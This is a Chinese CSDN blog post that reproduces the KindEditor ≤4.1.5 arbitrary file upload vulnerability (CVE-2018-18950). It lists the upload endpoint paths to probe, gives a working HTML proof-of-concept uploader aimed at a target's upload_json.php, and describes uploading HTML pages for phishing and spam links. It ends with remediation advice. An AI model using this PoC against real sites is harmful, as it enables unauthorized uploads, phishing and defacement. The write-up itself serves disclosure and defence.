KindEditor文件上传漏洞(CVE-2018-18950)

本文描述了KindEditor4.1.5编辑器中的文件上传漏洞,攻击者可以通过恶意HTML文件上传.txt和.html文件,进行钓鱼攻击。复现步骤包括查看版本、构造POC和使用CURL。修复建议是删除upload_json.和file_manager_json.文件。
摘要由CSDN通过智能技术生成

漏洞描述:

漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。 /php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。

复现过程:

1.访问ip;port

2.查看版本信息

/kindeditor.js

小于kindeditor4.1.5 ,证明存在文件上传漏洞

3.访问文件上传页面

4.进行尝试如下路径是否存在有必要验证文件 upload_json.*,常见判断路径如下:

​/asp/upload_json.asp?dir=file

​/asp.net/upload_json.ashx?dir=file

​/jsp/upload_json.jsp?dir=file

​/php/upload_json.php?dir=file

证明系统的语言为php

5.构造POC或者CURL提交文件。这次采用构造 POC,url替换为攻击url。

<html><head>

    <title>Uploader</title>

    <script src="http://ip:port/kindeditor.js"></script>

    <script>        KindEditor.ready(function (K) {            var uploadbutton = K.uploadbutton({                button: K('#uploadButton')[0],                fieldName: 'imgFile',                url: 'http://ip:port/php/upload_json.php?dir=file',                afterUpload: function (data) {                    if (data.error === 0) {                        var url = K.formatUrl(data.url, 'absolute');                        K('#url').val(url);                    }                },            });            uploadbutton.fileBox.change(function (e) {                uploadbutton.submit();            });        });    </script></head><body>

<div class="upload">

    <input class="ke-input-text" type="text" id="url" value="" readonly=“readonly”/>

    <input type="button" id="uploadButton" value="Upload"/>

</div>

</body>

</html>

​​​​​​​6.访问html文件如下

7.抓包,上传txt文件,获取返回路径

8.访问上传文件,发现成功上传

9.同时也可以上传.html文件

这就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址)

修复建议:

1.直接删除upload_json.和file_manager_json.即可

  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
对于 KindEditor 的任意文件上传漏洞,可以采取以下步骤进行防护: 1. 更新到最新版本:及时更新 KindEditor 到最新版本,以确保修复了已知的漏洞。 2. 文件类型白名单:在服务器端进行文件类型白名单限制,只允许上传特定的安全文件类型,并禁止上传可执行文件、脚本文件等危险文件类型。 3. 文件大小限制:限制上传文件的大小,控制上传文件的大小范围,以防止恶意用户上传过大的文件导致服务器资源耗尽。 4. 文件后缀检查:检查文件后缀是否与实际文件类型一致,避免恶意用户通过修改文件后缀绕过文件类型限制。 5. 文件内容检查:对上传的文件进行内容检查,使用杀毒软件或者自定义规则对上传的文件进行扫描,确保上传的文件没有包含恶意代码。 6. 临时文件处理:将上传的文件保存在非 Web 可访问目录下,并限制访问权限,防止用户直接访问上传的文件。 7. 强制下载:在返回上传成功的链接时,强制浏览器将其当做下载文件处理,而不是直接在浏览器中打开。 8. 日志监控:监控系统日志,及时发现异常行为,并及时采取相应的防护措施。 请注意,以上措施只是一些基本的防护措施,具体的防护策略需要根据实际需求和系统环境来确定。同时,建议定期对系统进行安全审计和漏洞扫描,及时修补已知漏洞
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值